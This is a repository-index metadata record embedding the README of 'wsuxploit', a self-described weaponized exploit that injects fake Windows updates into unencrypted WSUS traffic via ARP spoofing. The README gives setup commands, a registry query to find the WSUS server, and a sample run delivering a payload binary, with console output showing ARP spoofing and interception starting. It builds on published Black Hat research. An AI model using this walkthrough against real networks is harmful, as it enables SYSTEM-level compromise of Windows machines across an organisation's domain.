{"id":13827161,"url":"https://github.com/pimps/wsuxploit","last_synced_at":"2025-07-09T03:31:01.669Z","repository":{"id":45805019,"uuid":"95833745","full_name":"pimps/wsuxploit","owner":"pimps","description":"This is a weaponized WSUS exploit","archived":false,"fork":false,"pushed_at":"2022-11-25T10:04:15.000Z","size":1459,"stargazers_count":281,"open_issues_count":3,"forks_count":45,"subscribers_count":15,"default_branch":"master","last_synced_at":"2024-11-20T06:34:15.006Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Shell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/pimps.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2017-06-30T01:06:41.000Z","updated_at":"2024-10-25T08:28:08.000Z","dependencies_parsed_at":"2023-01-22T12:45:51.188Z","dependency_job_id":null,"html_url":"https://github.com/pimps/wsuxploit","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/pimps/wsuxploit","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pimps%2Fwsuxploit","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pimps%2Fwsuxploit/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pimps%2Fwsuxploit/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pimps%2Fwsuxploit/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pimps","download_url":"https://codeload.github.com/pimps/wsuxploit/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pimps%2Fwsuxploit/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":264386256,"owners_count":23599964,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-04T09:01:51.353Z","updated_at":"2025-07-09T03:31:01.177Z","avatar_url":"https://github.com/pimps.png","language":"Shell","funding_links":[],"categories":["\u003ca id=\"42f9e068b6511bcbb47d6b2b273097da\"\u003e\u003c/a\u003e未分类"],"sub_categories":["\u003ca id=\"3bd67ee9f322e2c85854991c85ed6da0\"\u003e\u003c/a\u003e投毒\u0026\u0026Poisoning"],"readme":"# WSUXploit\n\nWritten by Marcio Almeida to weaponize the use of [WSUSpect Proxy](https://github.com/ctxis/wsuspect-proxy/) created by Paul Stone and Alex Chapman in 2015 and public released by [Context Information Security](http://www.contextis.com)\n\n## Summary\n\nThis is a MiTM weaponized exploit script to inject 'fake' updates into non-SSL WSUS traffic.\nIt is based on the WSUSpect Proxy application that was introduced to public on the Black Hat USA 2015 presentation, 'WSUSpect – Compromising the Windows Enterprise via Windows Update'\n\nPlease read the White Paper and the presentation slides listed below:\n\n- White paper: http://www.contextis.com/documents/161/CTX_WSUSpect_White_Paper.pdf\n- Slides: http://www.contextis.com/documents/162/WSUSpect_Presentation.pdf\n\n## Prerequisites and Installation\n\nYou'll need install some programs used by this attack. You can do this by running:\n```\nsudo apt-get install samba dsniff iptables python\n```\n\nPS: Kali Linux builds already have all the before mentioned dependencies.\n\nWSUSpect Proxy requires the Python Twisted library. You can install it by running:\n```\npip install twisted\n```\n\nClone this repository and the WSUSpect Proxy repository. You can do it by running:\n```\n# clone WSUXploit repository\ngit clone https://github.com/pimps/wsuxploit.git\n\n# enter on wsuxploit directory\ncd wsuxploit\n\n# clone WSUSpect Proxy repository\ngit clone https://github.com/ctxis/wsuspect-proxy.git\n```\n\nYou're ready to go now :-)\n\n## Usage\n\nFirst things first...\n\nDiscover the WSUS address inside of the network that you're attacking and verify if it uses http protocol. If yes, you can use this exploit to get SYSTEM access to any windows target inside of that domain.\n\nIf you already have access to a Domain Machine, you can easily get the address of the WSUS server executing the following command:\n\n```\nreg query HKLM\\Software\\Policies\\Microsoft\\Windows\\WindowsUpdate /v WUServer\n```\n\nYou should see a response similar to that:\n\n```\nWUServer   REG_SZ  http://10.1.1.1:8535/\n```\n\nAfter confirm that the network you're attacking uses HTTP for Windows Update, you're good to go.\n\n```\nroot@kali-mini:/tmp/wsuxploit# ./wsuxploit.sh \n __      __  _____________ _______  ___      .__         .__  __   \n/  \\    /  \\/   _____/    |   \\   \\/  /_____ |  |   ____ |__|/  |_ \n\\   \\/\\/   /\\_____  \\|    |   /\\     /\\____ \\|  |  /  _ \\|  \\   __\\ \n \\        / /        \\    |  / /     \\|  |_\u003e \u003e  |_(  \u003c_\u003e )  ||  |  \n  \\__/\\  / /_______  /______/ /___/\\  \\   __/|____/\\____/|__||__|  \n       \\/          \\/               \\_/__|                         by pimps\nUsage:\n./wsuxploit.sh \u003cTARGET_IP\u003e \u003cWSUS_IP\u003e \u003cWSUS_PORT\u003e \u003cBINARY_PATH\u003e\n\nExample:\n./wsuxploit.sh 192.168.0.101 10.0.0.85 80 /tmp/payload.exe\n\nroot@kali-mini:/tmp/wsuxploit# ./wsuxploit.sh 192.168.0.101 10.1.1.1 8535 /tmp/beacon.exe\n __      __  _____________ _______  ___      .__         .__  __   \n/  \\    /  \\/   _____/    |   \\   \\/  /_____ |  |   ____ |__|/  |_ \n\\   \\/\\/   /\\_____  \\|    |   /\\     /\\____ \\|  |  /  _ \\|  \\   __\\ \n \\        / /        \\    |  / /     \\|  |_\u003e \u003e  |_(  \u003c_\u003e )  ||  |  \n  \\__/\\  / /_______  /______/ /___/\\  \\   __/|____/\\____/|__||__|  \n       \\/          \\/               \\_/__|                         by pimps\n[*] Preparing exploit files...\n[*] Spoofing arp replies...\n[*] Turning on IP forwarding...\n[*] Set iptables rules for SYN packets...\n[*] Running WSUSpect proxy...\n2017-06-30 09:46:59+1000 [-] Log opened.\n2017-06-30 09:46:59+1000 [-] InterceptingProxyFactory starting on 9090\n2017-06-30 09:46:59+1000 [-] Starting factory \u003cintercepting_proxy.InterceptingProxyFactory instance at 0xb650ce8c\u003e\n\n```\n\nWait for the Auto-Update requests, they happen by default every 23h and for the Important Update installs, they happen by default every 24h.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fpimps%2Fwsuxploit","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fpimps%2Fwsuxploit","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fpimps%2Fwsuxploit/lists"}